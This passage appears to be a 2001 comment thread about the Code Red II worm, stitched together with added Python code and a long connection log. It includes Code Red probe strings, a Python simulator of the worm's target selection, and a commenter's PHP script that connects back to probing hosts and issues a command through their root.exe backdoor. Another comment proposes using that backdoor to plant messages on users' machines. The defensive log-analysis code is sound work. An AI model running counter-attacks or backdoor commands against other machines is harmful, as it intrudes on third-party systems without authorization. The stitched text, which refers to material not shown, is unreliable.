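24.10.20.81 - - [04/Aug/2001:19:50:18 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 286
24.43.198.115 - - [04/Aug/2001:19:51:30 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 286
66.31.103.8 - - [04/Aug/2001:19:52:02 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3 HTTP/1.0" 404 286
24.10.17.144 - - [04/Aug/2001:19:58:09 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 286
208.253.160.5 - - [04/Aug/2001:20:03:57 -0400] "GET /index.html HTTP/1.0" 200 1043
24.10.20.81 - - [04/Aug/2001:20:15:24 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 286
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Fields of one access-log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path):
    """Name the worm family from the .ida request, or None for a normal request."""
    if not path.startswith("/default.ida?"):
        return None
    payload = path.split("?", 1)[1]
    if payload.startswith("N"):
        return "CodeRed1"    # original worm (v1 and the fixed-seed v2): run of N's
    if payload.startswith("X"):
        return "CodeRed2"    # Code Red II: run of X's
    return "unknown-ida"     # some other .ida probe, still worth a look


def locality(src, server_ip):
    """Attacker inside our /16, inside our /8 only, elsewhere, or not an IP at all."""
    try:
        a = ip_address(src)
    except ValueError:
        return "unresolved"  # log kept a hostname (HostnameLookups On)
    if a in ip_network(f"{server_ip}/16", strict=False):
        return "same_16"
    if a in ip_network(f"{server_ip}/8", strict=False):
        return "same_8"
    return "other"


def summarize(log_text, server_ip=SERVER_IP):
    """Counts of .ida hits by family, by source and by locality."""
    by_family, by_source, by_locality = Counter(), Counter(), Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        family = classify(rec["path"])
        if family is None:
            continue
        by_family[family] += 1
        by_source[rec["src"]] += 1
        by_locality[locality(rec["src"], server_ip)] += 1
    return {
        "total_ida": sum(by_family.values()),
        "by_family": dict(by_family),
        "by_source": dict(by_source),
        "by_locality": dict(by_locality),
    }


def abuse_report(summary):
    """One line per attacking source, busiest first, for the mail to the ISP."""
    ranked = sorted(summary["by_source"].items(), key=lambda kv: (-kv[1], kv[0]))
    return [f"{ip} {n}" for ip, n in ranked]


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    print(s["by_family"], s["by_locality"])
    print("\n".join(abuse_report(s)))
```

Feed it a real access_log with `summarize(open("access_log").read(), "your.server.ip")`; the error_log lines quoted at the top of the story carry no payload, so the N/X split only works on the access log.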
my roadrunner service has been slow and unstable for over a week now. But I only started receiving code red hits on aug 1st according to my logs. It's weird though... I would expect slowdown across the board - that is, affecting all services and slowing down data throughput, but it looks like my primary problem is an extremely slow dns resolution. Oddly enough, I still get full speed transfers after that. I think I'm going to do some reading and just start serving my own dns
I hereby propose we adopt your post as a convention.
We can thus encode "war stories" about the latest [worm/virus/trojan] as follows, saving Slashdot a fortune in bandwidth charges.
For instance, I can now describe my evening as follows:
"IIS. Code Red II. flaw. IIS. doesn't. FreeBSD. 429. worms. thousands. Apache. Apache. FreeBSD. company. worm. 6.2MB."
And why doesn't anyone sue M$ over all these security flaws? I know that if a company made an unsafe tire they get sued.. why not M$ for such awful code?
Because if M$ is like most other software companies, their license agreement says [in legalese], "Here's our software. No matter what our marketing materials say, we don't guarantee it against anything. If a bug or bugs in it causes someone to die, or you or your company to lose a million bucks, you're SOL and we're not liable-- because like we said, there's no guarantee, and frankly, you should have known better than to trust us."
The difference between Microsoft and Firestone is when the weaseling-out-of-accountability occurs: Firestone's army of lawyers did it after feces met fan blades by pointing fingers at Ford, Microsoft's did it in advance with the EULA, putting the onus on the hapless sysadmin who had to install that Windows claptrap when the suits ordered him to "make the company compatible with the rest of the world!"
~Philly
"So after the last 20 root exploits of Linux and Apache, we shouldn't use that either?"
Of course you shouldn't, especially if they happened within a short period of time. Why would you use any insecure system? If linux and apache got rooted as much as IIS you can bet your ass I'd drop it like a hot potato and move on to something else. There must be a thousand web servers out there both open source and commercial anybody who willingly uses an insecure one is just plain stupid at best and criminally negligent at worst.
War is necrophilia.
On the basis of that, this should work. I'll watch the logs with interest.
<?php
// Answer the worm's probe with an error, then connect back to the machine
// that probed us and ask its root.exe backdoor to rename itself, so the
// backdoor stops working. Only useful while the attacker still listens on 80.
header("HTTP/1.0 400 You cheeky fucker");
$attacker = $_SERVER['REMOTE_ADDR'];
$res = '';   // first line of the attacker's reply, empty if we never connected
?>
<html>
<title>Red Alert</title>
<?php
$fp = fsockopen($attacker, 80, $en, $es, 5);   // 5-second connect timeout
if (!$fp) {
    echo "I tried to disinfect you, but couldn't connect: $es ($en)";
} else {
    fputs($fp, "GET /scripts/root.exe?/c+ren+root.exe+infected.dat HTTP/1.0\r\n\r\n");
    echo "I tried to disinfect you, and the server started to say:<h2>";
    echo $res = fgets($fp, 1024);
    fclose($fp);
}
// keep a record of who probed us and what they answered
$log = fopen("/tmp/redalert.log", "a");
fwrite($log, $attacker . " " . date("r") . " " . $res . "\n");
fclose($log);
echo "</h2> " . $_SERVER['SERVER_SIGNATURE'];
?>
Actually, this would be version III, remember the one with the fixed random generator, that's version II.
I think the author of version three didn't know this and called his baby CodeRedII (I have seen it in a hexdump) and this new version looks so much different, I guess it's a copycat made to look like Code Red and leave a backdoor. It's simply one of many attempts to use the Code Red hysteria to get away with messing with other people's webservers.
100*100 = 10,000
100*100*100 = 1,000,000 (250,000 is probably the total number of hosts that will be infected, so you'll start getting diminishing returns as you get duplicates)
pick up a cable or dsl address then wait until sometime when you KNOW a user is around:
copy con sillymessage.txt
wake up, neo
notepad sillymessage.txt
copy con sillymessage.txt
follow the white rabbit
Why do you call this pattern bizarre? That's how I'd scan if I wrote a worm: if you manage to infect a computer at a particular IP address, then you have some evidence that computers 'close' to that one will probably be vulnerable as well, so you attempt to infect 'close' computers more than 'distant' ones.
You keep trying the 'distant' ones every now and then, just in case you get lucky.
-- Help Digitise the Public Domain at DP.
"It's not a war on drugs, it's a war on personal freedom. Keep that in mind at all times." Bill Hicks
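An added example (not from any poster, and not the worm's own code) of the locality-biased target selection described above: each pick keeps the first two octets of the scanning host's address, the first octet only, or nothing, and randomises the rest. The mix is set to the proportions commonly reported for Code Red II (3/8 same /16, 1/2 same /8, 1/8 anywhere); the page gives no figures, so treat them as an adjustable assumption. Running it from a hypothetical infected host and counting where the targets land reproduces the "most hits come from my own Class B" effect in the story.

```python
import random
from collections import Counter
from ipaddress import ip_address, ip_network

# Assumed target mix (see lead-in); whatever is left over is a fully random address.
P_SAME_16 = 3 / 8
P_SAME_8 = 1 / 2


def next_target(src, rng, p16=P_SAME_16, p8=P_SAME_8):
    """One target: keep 2, 1 or 0 leading octets of src, randomise the rest.

    src is assumed to be a routable unicast address (not 127.x or >= 224.x)."""
    o = [int(x) for x in src.split(".")]
    r = rng.random()
    keep = 2 if r < p16 else (1 if r < p16 + p8 else 0)
    while True:
        octets = o[:keep] + [rng.randrange(256) for _ in range(4 - keep)]
        # a scanner wastes no time on loopback or multicast/reserved space
        if octets[0] != 127 and octets[0] < 224:
            return ".".join(map(str, octets))


def sample_targets(src, n, seed=1, p16=P_SAME_16, p8=P_SAME_8):
    """n targets from a seeded generator, so a run is reproducible."""
    rng = random.Random(seed)
    return [next_target(src, rng, p16, p8) for _ in range(n)]


def locality(target, src):
    """Target relative to the scanning host: same /16, same /8 only, or elsewhere."""
    a = ip_address(target)
    if a in ip_network(f"{src}/16", strict=False):
        return "same_16"
    if a in ip_network(f"{src}/8", strict=False):
        return "same_8"
    return "other"


def locality_fractions(src, n=20000, seed=1, p16=P_SAME_16, p8=P_SAME_8):
    """Fraction of generated targets that fall into each locality class."""
    counts = Counter(locality(t, src) for t in sample_targets(src, n, seed, p16, p8))
    return {k: v / n for k, v in counts.items()}


if __name__ == "__main__":
    # Hypothetical infected cable-modem host in 24.x; compare the same_16 share
    # with the "89 of 148 from within my Class B" count in the story.
    print(locality_fractions("24.10.99.7"))
```

The same_16 share comes out slightly above p16 because a "same /8" pick lands in the home /16 once in 256 tries; the point for a defender is that a single infected neighbour in your /16 will hit you far more often than the rest of the Internet combined.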
The biggest problem I see is that any idiot can set up an IIS server.
I went to a training class once on IIS - we put in the CD, clicked "OK" a lot, and we had a web server! W00t! With an Apache installation on *nix, you have to know more. This keeps the intelligence level higher on the world's collective Apache admins. (And before you bring it up - yes, I am worried that Linux might go the same way.)
I've checked my logs and found the majority of attempts coming from sprintbbd.net. Now, it is VERY unlikely that real businesses with real, paid administrators get their connection from Sprint Broadband. (For one thing, the upload is capped at around 30k/sec.) I'll bet the majority of them are home user admin wanna-be's who run a pirated version of IIS. The chances are they don't know or don't care that they've been infected. (Or maybe they forgot that they installed a web server?)
That's frightening. That leads me to believe that this worm will never go away. As long as there are enough monkeys, it'll stick around.
I got my Linux laptop at System76.
While this is a remote exploit, it's not nearly as severe as the default.ida one on IIS. The apache exploit can be used to gather directory listings etc. and does NOT allow arbitrary code to run.
Must be a lot of people running win2k without turning off (or patching) IIS.. I read this story and noticed that ZoneAlarm recorded about 450 attempts in the last 10 hours.
I noticed that PenguinPPC has a Code Red Wall of Shame that details their hits. Interesting :)
My other car is first.
"Now that they have the backdoors, though, how hard would it be to patch them remotely?"
Why bother? can't you think of more interesting things to do with their computer?
War is necrophilia.
I'm sick of this shit. If I weren't a Libertarian, I'd be for licencing admins before they can play on the Internet. Even without MS code on my servers, I still pay for thier shoddy work.
A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
15:17:55.926357 66 66.31.103.8:1182
15:17:56.455575 66 66.31.103.8:1182
15:17:56.914265 66 66.31.103.8:1182
15:18:51.345615 66 66.31.154.13:3775
15:18:51.809777 66 66.31.154.13:3775
15:18:52.315579 66 66.31.154.13:3775
15:20:31.726119 66 h005004e76369.ne.mediaone.net:1464
15:26:57.052001 82 h00d0b7aae700.ne.mediaone.net:3273
15:26:57.554770 82 h00d0b7aae700.ne.mediaone.net:3273
15:26:58.080174 82 h00d0b7aae700.ne.mediaone.net:3273
15:32:13.332288 66 66.31.19.147:2582
15:32:16.792146 66 66.31.19.147:2582
15:38:43.880391 66 66.31.142.16:2833
15:38:44.349189 66 66.31.142.16:2833
15:38:44.837484 66 66.31.142.16:2833
15:38:52.958961 66 66.31.19.147:4967
15:38:56.331219 66 66.31.19.147:4967
15:39:22.530713 66 h005004e76369.ne.mediaone.net:3502
15:45:36.976398 66 66.31.219.14:3197
15:45:37.413835 66 66.31.219.14:3197
15:45:37.916280 66 66.31.219.14:3197
15:54:11.568987 66 66.31.19.147:4031
15:54:12.944575 66 66.31.19.147:4031
15:54:13.671940 66 66.31.19.147:4031
16:02:34.867118 66 66.31.132.21:2833
16:02:35.371367 66 66.31.132.21:2833
16:02:35.882127 66 66.31.132.21:2833
16:02:46.817720 66 h000102677395.ne.mediaone.net:1786
16:02:47.287915 66 h000102677395.ne.mediaone.net:1786
16:02:47.788921 66 h000102677395.ne.mediaone.net:1786
16:06:00.221683 66 66.31.176.78:4774
16:06:00.665340 66 66.31.176.78:4774
16:06:01.198356 66 66.31.176.78:4774
16:06:51.106485 66 66.31.63.221:1773
16:06:51.544882 66 66.31.63.221:1773
16:06:52.045970 66 66.31.63.221:1773
16:07:21.831421 66 h005004e76369.ne.mediaone.net:2806
16:13:37.998428 66 66.31.103.8:4157
16:13:38.630149 66 66.31.103.8:4157
16:13:39.212269 66 66.31.103.8:4157
16:13:52.402633 66 66.92.42.226:4663
16:13:53.045855 66 66.92.42.226:4663
16:13:53.839430 66 66.92.42.226:4663
16:18:50.300523 66 66.31.246.7:2321
16:18:53.282808 66 66.31.246.7:2321
16:18:59.316794 66 66.31.246.7:2321
16:21:09.464645 66 h0000b49dc596.ne.mediaone.net:3107
16:21:09.944963 66 h0000b49dc596.ne.mediaone.net:3107
16:21:10.443831 66 h0000b49dc596.ne.mediaone.net:3107
16:23:27.411286 66 66.31.185.167:2183
16:23:27.938047 66 66.31.185.167:2183
16:23:28.452444 66 66.31.185.167:2183
16:28:18.662032 66 66.31.34.197:1696
16:28:19.129875 66 66.31.34.197:1696
16:28:19.626824 66 66.31.34.197:1696
16:32:51.201752 66 66.31.19.147:2492
16:32:51.777039 66 66.31.19.147:2492
16:32:52.378695 66 66.31.19.147:2492
16:33:10.648478 66 h005004e76369.ne.mediaone.net:2842
16:34:06.006982 66 66.44.68.170:1422
16:34:08.745472 66 66.44.68.170:1422
16:34:12.646083 66 66.44.68.170:1422
16:34:56.562721 66 h005004e76369.ne.mediaone.net:1532
16:43:19.793887 66 66.31.246.7:2864
16:43:22.781620 66 66.31.246.7:2864
16:43:28.777960 66 66.31.246.7:2864
16:46:01.392954 66 h005004e76369.ne.mediaone.net:1295
16:46:21.879237 66 66.31.52.223:3247
16:46:22.392232 66 66.31.52.223:3247
16:46:22.887446 66 66.31.52.223:3247
16:47:05.175983 66 66.31.63.221:1297
16:47:05.636452 66 66.31.63.221:1297
16:47:06.145739 66 66.31.63.221:1297
16:49:09.419653 66 h005004e76369.ne.mediaone.net:4128
16:58:42.992110 66 h005004e76369.ne.mediaone.net:3037
17:01:18.504047 66 h005004e76369.ne.mediaone.net:3066
17:02:03.666041 66 66.31.219.14:1882
17:02:04.151032 66 66.31.219.14:1882
17:02:04.645839 66 66.31.219.14:1882
17:04:46.063851 70 66.31.104.220:3718
17:04:46.500532 70 66.31.104.220:3718
17:04:47.007617 70 66.31.104.220:3718
17:06:06.313739 82 h00d0b7aae700.ne.mediaone.net:4826
17:06:06.776410 82 h00d0b7aae700.ne.mediaone.net:4826
17:06:07.277350 82 h00d0b7aae700.ne.mediaone.net:4826
17:06:12.024931 66 66.31.185.167:1836
17:06:12.531221 66 66.31.185.167:1836
17:06:13.026034 66 66.31.185.167:1836
17:06:36.310510 66 h005004e76369.ne.mediaone.net:4019
17:07:23.861454 66 h005004e76369.ne.mediaone.net:4160
17:08:42.640964 82 h00a0cc3b6d03.ne.mediaone.net:1390
17:08:43.136835 82 h00a0cc3b6d03.ne.mediaone.net:1390
17:08:43.648328 82 h00a0cc3b6d03.ne.mediaone.net:1390
17:18:12.932029 66 h00a0cc65dafd.ne.mediaone.net:2123
17:18:13.353661 66 h00a0cc65dafd.ne.mediaone.net:2123
17:18:13.861988 66 h00a0cc65dafd.ne.mediaone.net:2123
17:25:33.297043 66 h000102677395.ne.mediaone.net:2526
17:25:33.847671 66 h000102677395.ne.mediaone.net:2526
17:25:34.309018 66 h000102677395.ne.mediaone.net:2526
17:26:58.779025 66 h005004e76369.ne.mediaone.net:4632
17:29:48.823342 66 61.33.72.216:3658
17:29:49.539975 66 61.33.72.216:3658
17:29:50.224710 66 61.33.72.216:3658
17:48:19.979383 66 208.253.160.5:4707
17:48:20.654818 66 208.253.160.5:4707
17:48:21.414775 66 208.253.160.5:4707
17:48:45.888894 82 h00d0b7aae700.ne.mediaone.net:3340
17:48:46.358168 82 h00d0b7aae700.ne.mediaone.net:3340
17:48:46.847613 82 h00d0b7aae700.ne.mediaone.net:3340
17:50:45.075031 82 h0000b4aab5d3.ne.mediaone.net:4444
17:50:45.525336 82 h0000b4aab5d3.ne.mediaone.net:4444
17:50:46.038720 82 h0000b4aab5d3.ne.mediaone.net:4444
17:53:41.214093 66 66.31.103.8:1104
17:53:41.741649 66 66.31.103.8:1104
17:53:42.292439 66 66.31.103.8:1104
17:58:25.250308 66 h00a0cc65dafd.ne.mediaone.net:4008
17:58:25.699150 66 h00a0cc65dafd.ne.mediaone.net:4008
17:58:26.193852 66 h00a0cc65dafd.ne.mediaone.net:4008
18:01:42.732898 66 66.31.63.221:1968
18:01:43.221104 66 66.31.63.221:1968
18:01:43.727629 66 66.31.63.221:1968
18:02:40.305859 82 h0000b4aab5d3.ne.mediaone.net:4545
18:02:40.775736 82 h0000b4aab5d3.ne.mediaone.net:4545
18:02:41.276412 82 h0000b4aab5d3.ne.mediaone.net:4545
18:10:04.114976 82 h00d0b7aae700.ne.mediaone.net:3587
18:10:04.575032 82 h00d0b7aae700.ne.mediaone.net:3587
18:10:05.090142 82 h00d0b7aae700.ne.mediaone.net:3587
18:10:26.320653 82 66.31.90.18:4930
18:10:26.857307 82 66.31.90.18:4930
18:10:27.367300 82 66.31.90.18:4930
18:19:26.919274 66 66.121.141.35:1497
18:19:29.805117 66 66.121.141.35:1497
18:19:32.173330 66 66.31.103.8:4009
18:19:35.989912 66 66.121.141.35:1497
18:19:38.772854 66 66.31.103.8:4009
18:21:41.317501 66 66.31.19.147:3137
18:21:41.818342 66 66.31.19.147:3137
18:21:42.331541 66 66.31.19.147:3137
18:27:52.950866 66 66.31.119.51:3345
18:27:53.553234 66 66.31.119.51:3345
18:27:54.048585 66 66.31.119.51:3345
18:31:17.268443 66 66.31.103.8:1696
18:31:17.829718 66 66.31.103.8:1696
18:31:18.366996 66 66.31.103.8:1696
18:35:51.218420 66 h005004e76369.ne.mediaone.net:3776
18:36:58.682052 66 66.31.134.132:4090
18:36:59.129858 66 66.31.134.132:4090
18:36:59.630050 66 66.31.134.132:4090
18:39:29.188936 82 66.31.90.18:1650
18:39:29.622501 82 66.31.90.18:1650
18:39:30.118453 82 66.31.90.18:1650
18:43:26.132491 66 66.31.185.167:3771
18:43:26.614625 66 66.31.185.167:3771
18:43:27.129779 66 66.31.185.167:3771
18:44:25.438253 66 66.31.34.197:1097
18:44:25.963355 66 66.31.34.197:1097
18:44:26.466727 66 66.31.34.197:1097
18:46:56.491135 82 h0000b4aab5d3.ne.mediaone.net:1961
18:46:56.957798 82 h0000b4aab5d3.ne.mediaone.net:1961
18:46:57.460238 82 h0000b4aab5d3.ne.mediaone.net:1961
18:50:39.557280 66 66.31.19.147:1088
18:50:40.017639 66 66.31.19.147:1088
18:50:40.534323 66 66.31.19.147:1088
19:01:31.666048 66 66.31.19.147:1418
19:01:32.148542 66 66.31.19.147:1418
19:01:32.667597 66 66.31.19.147:1418
19:04:32.656488 66 66.31.110.214:2229
19:04:33.160366 66 66.31.110.214:2229
19:04:33.632996 66 66.31.110.214:2229
19:05:52.903592 66 h0000b49dc596.ne.mediaone.net:3123
19:05:53.349706 66 h0000b49dc596.ne.mediaone.net:3123
19:05:53.888686 66 h0000b49dc596.ne.mediaone.net:3123
19:09:50.609974 66 66.31.110.214:1256
19:09:51.154162 66 66.31.110.214:1256
19:09:51.680749 66 66.31.110.214:1256
19:11:03.591419 82 h00a0cc3b6d03.ne.mediaone.net:1628
19:11:04.038952 82 h00a0cc3b6d03.ne.mediaone.net:1628
19:11:04.560143 82 h00a0cc3b6d03.ne.mediaone.net:1628
19:13:00.373239 66 66.31.176.78:2697
19:13:00.885214 66 66.31.176.78:2697
19:13:01.411488 66 66.31.176.78:2697
19:13:36.557801 66 66.31.19.147:4827
19:13:37.009486 66 66.31.19.147:4827
19:13:37.546756 66 66.31.19.147:4827
19:14:01.915179 66 h005004e76369.ne.mediaone.net:3132
19:17:49.472740 82 66.20.90.161:1188
19:17:50.706806 82 66.20.90.161:1188
19:17:51.205373 82 66.20.90.161:1188
19:17:51.260347 66 66.31.110.214:1805
19:17:51.777707 66 66.31.110.214:1805
19:17:52.274677 66 66.31.110.214:1805
19:18:18.146159 66 66.31.19.147:2433
19:18:18.610886 66 66.31.19.147:2433
19:18:19.093770 66 66.31.19.147:2433
19:24:03.258744 66 h005004e76369.ne.mediaone.net:2709
19:25:59.513734 66 h005004e76369.ne.mediaone.net:4876
19:31:10.452058 82 h00d0b7aae700.ne.mediaone.net:3013
19:31:10.995839 82 h00d0b7aae700.ne.mediaone.net:3013
19:31:11.520479 82 h00d0b7aae700.ne.mediaone.net:3013
19:31:42.818299 66 66.31.23.222:3614
19:31:43.341462 66 66.31.23.222:3614
19:31:43.832391 66 66.31.23.222:3614
19:35:33.305615 66 66.31.23.222:2329
19:35:33.858879 66 66.31.23.222:2329
19:35:34.380045 66 66.31.23.222:2329
19:36:15.488788 82 66.31.90.18:3920
19:36:15.919015 82 66.31.90.18:3920
19:36:16.416156 82 66.31.90.18:3920
19:37:18.674745 82 h0000b4aab5d3.ne.mediaone.net:3186
19:37:19.141809 82 h0000b4aab5d3.ne.mediaone.net:3186
19:37:19.639118 82 h0000b4aab5d3.ne.mediaone.net:3186
19:37:24.595907 66 66.31.34.197:2631
19:37:25.073936 66 66.31.34.197:2631
19:37:25.565188 66 66.31.34.197:2631
19:40:03.296489 66 66.31.219.14:3213
19:40:03.743324 66 66.31.219.14:3213
19:40:04.250018 66 66.31.219.14:3213
19:40:52.479756 66 66.47.109.44:1952
19:40:52.983786 66 66.47.109.44:1952
19:45:48.666308 66 66.31.103.8:1354
19:45:49.199602 66 66.31.103.8:1354
19:45:49.762800 66 66.31.103.8:1354
19:48:43.717171 66 66.31.119.51:4949
19:48:44.224199 66 66.31.119.51:4949
19:48:44.735539 66 66.31.119.51:4949
19:55:45.300803 66 h005004e76369.ne.mediaone.net:3881
19:57:47.694040 66 66.72.102.56:2366
19:57:54.438890 66 66.72.102.56:2366
19:57:58.796383 66 66.31.63.221:3454
19:57:59.280563 66 66.31.63.221:3454
19:57:59.785846 66 66.31.63.221:3454
20:03:57.649227 66 66.8.138.149:1328
20:03:58.262279 66 66.8.138.149:1328
20:03:58.862178 66 66.8.138.149:1328
20:04:57.092114 66 66.31.185.167:4905
20:04:57.668327 66 66.31.185.167:4905
20:04:58.228124 66 66.31.185.167:4905
20:07:35.614262 82 h00d0b7aae700.ne.mediaone.net:1964
20:07:36.084504 82 h00d0b7aae700.ne.mediaone.net:1964
20:07:36.597473 82 h00d0b7aae700.ne.mediaone.net:1964
20:08:48.105066 66 66.31.19.147:4928
20:08:48.596219 66 66.31.19.147:4928
20:08:49.105219 66 66.31.19.147:4928
20:13:58.866231 66 66.31.110.214:2123
20:13:59.346348 66 66.31.110.214:2123
20:13:59.850031 66 66.31.110.214:2123
20:15:24.291724 66 168.191.87.14:3837
20:15:27.257603 66 168.191.87.14:3837
20:15:32.075376 66 168.191.87.14:3837
20:23:47.414620 66 h005004e76369.ne.mediaone.net:2972
20:28:35.272954 66 66.31.185.167:2469
20:28:35.930940 66 66.31.185.167:2469
20:28:36.466283 66 66.31.185.167:2469
20:34:01.123468 66 66.31.134.132:1852
20:34:01.564138 66 66.31.134.132:1852
20:34:02.072934 66 66.31.134.132:1852
20:39:16.574358 66 66.31.119.51:4249
20:39:17.174922 66 66.31.119.51:4249
20:39:17.717080 66 66.31.119.51:4249
20:39:38.389574 66 66.31.185.167:1473
20:39:38.910794 66 66.31.185.167:1473
20:39:39.792199 66 66.31.185.167:1473
20:50:33.690912 66 66.31.154.13:3908
20:50:34.188717 66 66.31.154.13:3908
20:50:34.666215 66 66.31.154.13:3908
20:51:26.698337 82 66.108.14.19:4641
20:51:27.234215 82 66.108.14.19:4641
20:51:27.851212 82 66.108.14.19:4641
20:54:39.440536 66 66.31.182.114:2421
20:54:39.939779 66 66.31.182.114:2421
20:54:40.478663 66 66.31.182.114:2421
20:59:23.096409 66 66.31.19.147:4982
20:59:23.651718 66 66.31.19.147:4982
20:59:24.104612 66 66.31.19.147:4982
20:59:55.992071 66 66.31.110.214:3859
20:59:56.994188 66 66.31.110.214:3859
20:59:57.512260 66 66.31.110.214:3859
21:07:16.914349 66 h0020780443d3.ne.mediaone.net:4414
21:07:17.415319 66 h0020780443d3.ne.mediaone.net:4414
21:07:17.884111 66 h0020780443d3.ne.mediaone.net:4414
21:09:45.978620 66 66.31.93.113:2343
21:09:46.459449 66 66.31.93.113:2343
21:09:46.964479 66 66.31.93.113:2343
21:11:19.500644 66 66.31.142.16:4666
21:11:19.982867 66 66.31.142.16:4666
21:11:20.490040 66 66.31.142.16:4666
21:20:45.663095 66 h005004e76369.ne.mediaone.net:1904
21:20:49.129672 66 66.31.176.78:3738
21:20:49.594183 66 66.31.176.78:3738
21:20:50.101531 66 66.31.176.78:3738
21:22:05.996973 66 66.31.119.51:3563
21:22:06.505440 66 66.31.119.51:3563
21:22:07.008934 66 66.31.119.51:3563
21:22:18.541396 66 h005004e76369.ne.mediaone.net:3485
21:24:16.676478 66 66.27.194.28:4941
21:24:17.231783 66 66.27.194.28:4941
21:24:17.813206 66 66.27.194.28:4941
21:25:42.561997 66 h005004e76369.ne.mediaone.net:1796
21:26:05.362410 66 66.65.7.216:3089
21:26:05.902204 66 66.65.7.216:3089
21:26:06.379554 66 66.65.7.216:3089
21:28:00.078502 66 h005004e76369.ne.mediaone.net:1066
21:29:10.417433 66 h0020780443d3.ne.mediaone.net:1929
21:29:10.888167 66 h0020780443d3.ne.mediaone.net:1929
21:29:11.393278 66 h0020780443d3.ne.mediaone.net:1929
21:37:02.743336 66 h005004e76369.ne.mediaone.net:3971
21:43:05.435234 82 66.31.90.18:1966
21:43:08.374029 82 66.31.90.18:1966
21:43:14.401388 82 66.31.90.18:1966
21:45:17.561709 66 h000102677395.ne.mediaone.net:2000
21:45:17.998424 66 h000102677395.ne.mediaone.net:2000
21:45:18.499826 66 h000102677395.ne.mediaone.net:2000
21:55:05.915115 66 h005004e76369.ne.mediaone.net:3185
22:08:23.023150 66 h0000b49dc596.ne.mediaone.net:4634
22:08:23.557906 66 h0000b49dc596.ne.mediaone.net:4634
22:08:24.144216 66 h0000b49dc596.ne.mediaone.net:4634
22:09:12.966844 66 66.31.244.129:2952
22:09:13.537797 66 66.31.244.129:2952
22:09:14.041465 66 66.31.244.129:2952
22:24:18.203210 66 66.31.110.214:3110
22:24:18.690633 66 66.31.110.214:3110
22:24:19.156846 66 66.31.110.214:3110
22:26:41.235110 66 h000102677395.ne.mediaone.net:1964
22:26:42.005716 66 h000102677395.ne.mediaone.net:1964
22:26:42.772255 66 h000102677395.ne.mediaone.net:1964
22:28:18.796708 66 66.31.176.78:3969
22:28:19.269487 66 66.31.176.78:3969
22:28:19.764580 66 66.31.176.78:3969
22:28:35.194390 82 h00a0cc3b6d03.ne.mediaone.net:1833
22:28:35.750994 82 h00a0cc3b6d03.ne.mediaone.net:1833
22:28:36.274949 82 h00a0cc3b6d03.ne.mediaone.net:1833
22:33:25.496157 66 66.31.244.129:2010
22:33:26.031236 66 66.31.244.129:2010
22:33:26.561286 66 66.31.244.129:2010
22:37:47.320547 82 66.31.90.18:1081
22:37:47.803008 82 66.31.90.18:1081
22:37:48.291875 82 66.31.90.18:1081
22:38:49.048073 82 66.31.90.18:2910
22:38:49.603072 82 66.31.90.18:2910
22:38:50.120720 82 66.31.90.18:2910
22:45:53.412650 82 h0000b4aab5d3.ne.mediaone.net:1196
22:45:53.922510 82 h0000b4aab5d3.ne.mediaone.net:1196
22:45:54.422061 82 h0000b4aab5d3.ne.mediaone.net:1196
22:49:30.259622 66 h00c04ff51cd7.ne.mediaone.net:3364
22:49:30.800502 66 h00c04ff51cd7.ne.mediaone.net:3364
22:49:31.313960 66 h00c04ff51cd7.ne.mediaone.net:3364
22:51:33.085732 66 h005004e76369.ne.mediaone.net:2700
22:52:59.708929 66 66.21.239.11:4366
22:53:00.190556 66 66.21.239.11:4366
22:53:00.686654 66 66.21.239.11:4366
22:54:23.964379 66 66.31.252.167:4770
22:54:24.480645 66 66.31.252.167:4770
22:54:24.990684 66 66.31.252.167:4770
22:54:58.617700 82 h0000b4aab5d3.ne.mediaone.net:4643
22:54:59.053355 82 h0000b4aab5d3.ne.mediaone.net:4643
22:54:59.562599 82 h0000b4aab5d3.ne.mediaone.net:4643
22:58:24.200320 82 h00d0b7aae700.ne.mediaone.net:2439
22:58:24.692829 82 h00d0b7aae700.ne.mediaone.net:2439
22:58:25.192211 82 h00d0b7aae700.ne.mediaone.net:2439
23:02:38.224189 66 h005004e76369.ne.mediaone.net:2539
23:04:04.079205 66 66.31.219.14:1687
23:04:04.566883 66 66.31.219.14:1687
23:04:05.054512 66 66.31.219.14:1687
23:04:12.680565 66 66.31.142.16:2751
23:04:13.112318 66 66.31.142.16:2751
23:04:13.637844 66 66.31.142.16:2751
23:06:33.553378 66 66.31.252.167:4922
23:06:34.026042 66 66.31.252.167:4922
23:06:34.526973 66 66.31.252.167:4922
23:07:36.167238 66 h0050dabb01ca.ne.mediaone.net:4166
23:07:37.233513 66 h0050dabb01ca.ne.mediaone.net:4166
23:07:37.775333 66 h0050dabb01ca.ne.mediaone.net:4166
23:14:11.353025 66 h0050dabb01ca.ne.mediaone.net:1081
23:14:12.114457 66 h0050dabb01ca.ne.mediaone.net:1081
23:14:12.963133 66 h0050dabb01ca.ne.mediaone.net:1081
23:19:47.570412 66 h005004e76369.ne.mediaone.net:1692
23:23:02.185940 66 66.31.182.114:1400
23:23:02.654633 66 66.31.182.114:1400
23:23:03.149660 66 66.31.182.114:1400
23:25:03.618435 66 66.31.182.114:4104
23:25:04.091462 66 66.31.182.114:4104
23:25:04.618119 66 66.31.182.114:4104
23:29:11.714033 66 66.31.252.167:2418
23:29:12.233030 66 66.31.252.167:2418
23:29:12.742194 66 66.31.252.167:2418
23:38:22.485507 82 h0000b4aab5d3.ne.mediaone.net:2540
23:38:22.966452 82 h0000b4aab5d3.ne.mediaone.net:2540
23:38:23.471937 82 h0000b4aab5d3.ne.mediaone.net:2540
23:42:36.438459 82 h00a0cc3b6d03.ne.mediaone.net:4347
23:42:36.918165 82 h00a0cc3b6d03.ne.mediaone.net:4347
